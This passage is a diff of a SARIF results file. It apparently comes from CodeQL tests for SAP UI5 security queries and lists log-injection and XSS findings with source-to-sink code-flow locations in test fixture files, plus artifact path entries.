9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 18, - "endColumn" : 41 - } - }, - "message" : { - "text" : "`[INFO] ... value}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 18, - "endColumn" : 42 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e197b363f9dc3962:1", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... 
, true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 34, - "endColumn" : 40 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 18, - "endColumn" : 42 - } - }, - "message" : { - "text" : "`[INFO] ... 
alue1}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "45280b24f3d81287:1", - "primaryLocationStartColumnFingerprint" : "12" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "req.responseText" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "req.responseText" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" 
: { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 5, - "startColumn" : 27, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "92dbc37bdafc7694:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... 
param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 5, - "startColumn" : 27, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 12, - "startColumn" : 27, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "faa1832c387d2ee5:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 12, - "startColumn" : 27, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 119 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 33 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8291f53a2e235d15:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... 
.search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... 
(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 132, - "startColumn" : 7, - "endLine" : 134, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "63ace7b071639814:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 25, - "endColumn" : 48 - } - }, - "message" : { - "text" : "oSearch ... Value()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 11, - "endColumn" : 48 - } - }, - "message" : { - "text" : "searchValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 27, - "startColumn" : 34, - "endColumn" : 45 - } - }, - "message" : { - "text" : "searchValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 17, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ type: \"string\" }" 
- } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 133, - "startColumn" : 8, - "endColumn" : 27 - } - }, - "message" : { - "text" : "oControl.getTitle()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 132, - "startColumn" : 7, - "endLine" : 134, - "endColumn" : 16 - } - }, - "message" : { - "text" : "\"
T ...
\"" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 25, - "endColumn" : 48 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 123 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 14, - "startColumn" : 23, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fc87b07640e9d85:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 14, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : 
"oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 14, - "startColumn" : 32, - "endColumn" : 50 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "352d5eac262ae765:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - }, - "region" : { - 
"startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 14, - "startColumn" : 32, - "endColumn" : 50 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 14, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "352d5ec8b0c3bb0d:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 37 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 14, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : 
